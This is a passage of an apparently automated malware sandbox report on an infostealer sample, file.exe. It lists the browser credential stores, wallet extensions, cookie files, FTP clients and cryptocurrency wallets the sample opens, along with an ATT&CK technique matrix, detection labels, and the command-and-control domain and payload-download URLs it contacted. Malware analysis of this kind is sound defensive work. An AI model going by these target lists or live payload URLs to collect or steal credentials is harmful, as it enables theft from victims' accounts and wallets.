                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: Yara matchFile source: 00000000.00000003.1594408142.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1624888871.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1541778568.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1594686688.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6376, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6376, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                Registry Run Keys / Startup Folder
                12
                Process Injection
                1
                Masquerading
                2
                OS Credential Dumping
                1
                Query Registry
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                Registry Run Keys / Startup Folder
                35
                Virtualization/Sandbox Evasion
                LSASS Memory761
                Security Software Discovery
                Remote Desktop Protocol41
                Data from Local System
                11
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                12
                Process Injection
                Security Account Manager35
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials223
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe37%ReversingLabsWin32.Trojan.Symmi
                file.exe100%AviraTR/Crypt.XPACK.Gen
                file.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://atten-supporse.biz/RSz0%Avira URL Cloudsafe
                https://atten-supporse.biz/apibdoD0%Avira URL Cloudsafe
                https://atten-supporse.biz/JSB0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                atten-supporse.biz
                104.21.16.9
                truefalse
                  high
                  www.google.com
                  172.217.21.36
                  truefalse
                    high
                    s-part-0035.t-0009.t-msedge.net
                    13.107.246.63
                    truefalse
                      high
                      js.monitor.azure.com
                      unknown
                      unknownfalse
                        high
                        mdec.nelreports.net
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://atten-supporse.biz/apifalse
                            high
                            https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_131.8.drfalse
                                high
                                https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_131.8.drfalse
                                      high
                                      https://atten-supporse.biz/apibdoDfile.exe, 00000000.00000003.1850545597.0000000001178000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.linkedin.com/cws/share?url=$chromecache_110.8.dr, chromecache_122.8.drfalse
                                        high
                                        https://atten-supporse.biz/RSzfile.exe, 00000000.00000003.1594408142.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1827558227.00000000011CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.1596095923.0000000001209000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://github.com/Youssef1313chromecache_131.8.drfalse
                                              high
                                              https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_110.8.dr, chromecache_122.8.drfalse
                                                high
                                                https://aka.ms/msignite_docs_bannerchromecache_110.8.dr, chromecache_122.8.drfalse
                                                  high
                                                  https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_122.8.drfalse
                                                    high
                                                    http://polymer.github.io/AUTHORS.txtchromecache_110.8.dr, chromecache_122.8.drfalse
                                                      high
                                                      https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_131.8.drfalse
                                                        high
                                                        https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_110.8.dr, chromecache_122.8.drfalse
                                                          high
                                                          https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_131.8.drfalse
                                                            high
                                                            http://x1.c.lencr.org/0file.exe, 00000000.00000003.1594872193.0000000005969000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://x1.i.lencr.org/0file.exe, 00000000.00000003.1594872193.0000000005969000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aka.ms/pshelpmechoosechromecache_110.8.dr, chromecache_122.8.drfalse
                                                                  high
                                                                  https://aka.ms/feedback/report?space=61chromecache_131.8.dr, chromecache_132.8.dr, chromecache_95.8.drfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://learn-video.azurefd.net/vod/playerchromecache_110.8.dr, chromecache_122.8.drfalse
                                                                        high
                                                                        https://twitter.com/intent/tweet?original_referer=$chromecache_110.8.dr, chromecache_122.8.drfalse
                                                                          high
                                                                          https://github.com/gewarrenchromecache_131.8.drfalse
                                                                            high
                                                                            https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1595749127.0000000005A6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://polymer.github.io/CONTRIBUTORS.txtchromecache_110.8.dr, chromecache_122.8.drfalse
                                                                                high
                                                                                https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_131.8.drfalse
                                                                                  high
                                                                                  https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_131.8.drfalse
                                                                                    high
                                                                                    https://client-api.arkoselabs.com/v2/api.jschromecache_110.8.dr, chromecache_122.8.drfalse
                                                                                      high
                                                                                      https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_110.8.dr, chromecache_122.8.drfalse
                                                                                        high
                                                                                        https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_110.8.dr, chromecache_122.8.drfalse
                                                                                          high
                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://github.com/Thrakachromecache_131.8.drfalse
                                                                                              high
                                                                                              http://polymer.github.io/PATENTS.txtchromecache_110.8.dr, chromecache_122.8.drfalse
                                                                                                high
                                                                                                https://aka.ms/certhelpchromecache_110.8.dr, chromecache_122.8.drfalse
                                                                                                  high
                                                                                                  http://185.215.113.16/steam/random.exefile.exe, 00000000.00000003.1850545597.000000000117E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1944171939.000000000117E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1594872193.0000000005969000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://atten-supporse.biz/JSBfile.exe, 00000000.00000003.1594408142.00000000011E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://github.com/mairawchromecache_131.8.drfalse
                                                                                                          high
                                                                                                          http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1594872193.0000000005969000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://schema.orgchromecache_122.8.drfalse
                                                                                                              high
                                                                                                              http://polymer.github.io/LICENSE.txtchromecache_110.8.dr, chromecache_122.8.drfalse
                                                                                                                high
                                                                                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.file.exe, 00000000.00000003.1596095923.0000000001209000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1595749127.0000000005A6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44file.exe, 00000000.00000003.1596095923.0000000001209000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://aka.ms/yourcaliforniaprivacychoiceschromecache_131.8.drfalse
                                                                                                                          high
                                                                                                                          https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://github.com/nschonnichromecache_131.8.drfalse
                                                                                                                              high
                                                                                                                              https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_110.8.dr, chromecache_122.8.drfalse
                                                                                                                                high
                                                                                                                                https://github.com/adegeochromecache_131.8.drfalse
                                                                                                                                  high
                                                                                                                                  http://crl.microfile.exe, 00000000.00000003.1827558227.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1666285292.00000000011C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.1596095923.0000000001209000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://github.com/jonschlinkert/is-plain-objectchromecache_110.8.dr, chromecache_122.8.drfalse
                                                                                                                                        high
                                                                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1594872193.0000000005969000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://octokit.github.io/rest.js/#throttlingchromecache_110.8.dr, chromecache_122.8.drfalse
                                                                                                                                            high
                                                                                                                                            https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&ufile.exe, 00000000.00000003.1596095923.0000000001209000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&ctafile.exe, 00000000.00000003.1596095923.0000000001209000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgfile.exe, 00000000.00000003.1596095923.0000000001209000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://github.com/js-cookie/js-cookiechromecache_110.8.dr, chromecache_122.8.drfalse
                                                                                                                                                    high
                                                                                                                                                    http://185.215.113.16/off/def.exefile.exe, 00000000.00000003.1827743180.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850545597.000000000117E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850545597.0000000001178000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1944171939.0000000001170000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1944171939.000000000117E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1943737468.0000000000EFB000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000003.1827515414.00000000011E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schema.org/Organizationchromecache_131.8.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://atten-supporse.biz/file.exe, 00000000.00000003.1594408142.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850545597.0000000001178000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1944171939.000000000111E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1666285292.00000000011D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541800383.00000000011E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1624992046.00000000011E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://channel9.msdn.com/chromecache_110.8.dr, chromecache_122.8.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1542002887.0000000005976000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541935629.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://github.com/dotnet/trychromecache_110.8.dr, chromecache_122.8.drfalse
                                                                                                                                                                high
                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                13.107.246.63
                                                                                                                                                                s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                185.215.113.16
                                                                                                                                                                unknownPortugal
                                                                                                                                                                206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                239.255.255.250
                                                                                                                                                                unknownReserved
                                                                                                                                                                unknownunknownfalse
                                                                                                                                                                104.21.16.9
                                                                                                                                                                atten-supporse.bizUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                172.217.21.36
                                                                                                                                                                www.google.comUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                IP
                                                                                                                                                                192.168.2.8
                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                Analysis ID:1566421
